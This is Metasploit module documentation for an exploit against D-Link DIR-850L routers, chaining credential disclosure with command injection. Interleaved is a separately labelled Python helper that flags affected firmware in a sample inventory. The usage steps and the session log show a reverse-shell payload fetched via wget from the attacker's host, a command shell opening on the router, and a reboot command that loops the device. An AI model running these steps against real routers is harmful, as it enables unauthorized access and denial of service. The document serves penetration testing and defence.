metasploit-gs/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md
2017-11-02 15:54:45 -04:00

The module dlink_dir850l_unauth_exec leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands via an authenticated OS command injection vulnerability. D-Link 850L devices (excluding "Cloud" models) with firmware versions up to 1.14B07 are potentially vulnerable. The vulnerability seems to occur within the parsing of the config. Another PoC can be found at https://www.seebug.org/vuldb/ssvid-96333. Setting the command to reboot will force the router into an infinite loop.
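An added triage helper (not part of this module or the Metasploit project) that applies the affected-version rule above to a constructed device inventory, so a defender can flag which units to update or isolate. The "DIR-850L" model string, the "Cloud" substring marking the excluded models, and the `<major>.<minor>B<build>` version format are assumptions.

```python
import re

# Firmware versions up to and including this one are listed as affected above.
LAST_AFFECTED = "1.14B07"

# Assumed D-Link version format: "1.14B07" -> major 1, minor 14, build 07.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:B(\d+))?$", re.IGNORECASE)


def parse_dlink_version(version):
    """Parse '1.14B07' into a comparable (major, minor, build) tuple.

    A missing B<nn> build suffix is treated as build 0. Raises ValueError
    on strings that do not match the assumed format.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError("unrecognised firmware version: %r" % version)
    major, minor, build = m.groups()
    return (int(major), int(minor), int(build or 0))


def is_potentially_vulnerable(model, firmware):
    """True when the model/firmware pair falls inside the affected range.

    Assumptions: the model string contains '850L', and the excluded Cloud
    variants carry 'Cloud' somewhere in the model string.
    """
    if "850L" not in model.upper() or "cloud" in model.lower():
        return False
    return parse_dlink_version(firmware) <= parse_dlink_version(LAST_AFFECTED)


# Constructed inventory sample, not real device data.
INVENTORY = [
    ("DIR-850L", "1.14B07"),        # last affected build
    ("DIR-850L", "1.09B02"),        # older, affected
    ("DIR-850L", "1.15B03"),        # newer than the affected range
    ("DIR-850L Cloud", "1.10B05"),  # Cloud model, excluded above
    ("DIR-860L", "1.14B07"),        # different model, out of scope
]


def triage(inventory):
    """Return the (model, firmware) pairs that need updating or isolation."""
    return [(m, fw) for m, fw in inventory if is_potentially_vulnerable(m, fw)]


if __name__ == "__main__":
    for model, fw in triage(INVENTORY):
        print("%s %s: potentially vulnerable, update firmware" % (model, fw))
```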

Vulnerable Application

  1. Start msfconsole
  2. Do: use exploit/linux/http/dlink_dir850l_unauth_exec.rb
  3. Do: set RHOST [RouterIP]
  4. Do: set PAYLOAD linux/mipsle/shell/reverse_tcp
  5. Do: run
  6. If the router is vulnerable, the payload should be dropped via wget and executed, and you should obtain a session

Example

msf > use exploit/linux/http/dlink_850l_unauth_exec
msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14
RHOST => 192.168.0.14
msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80
RPORT => 80
msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3
LHOST => ens3
msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351
LPORT => 1351
msf exploit(dlink_850l_unauthenticated_exec) > run

[*] Started reverse TCP handler on 192.168.0.11:1351
[*] 192.168.0.14:80 - Initiating exploitation...
[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl
[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl
[*] 192.168.0.14:80 - Retrieving uid and auth challenge...
[*] Command Stager progress - 100.00% done (101/101 bytes)
[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl
[*] Sending payload to 192.168.0.14 (Wget)
[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400
[*] Server stopped.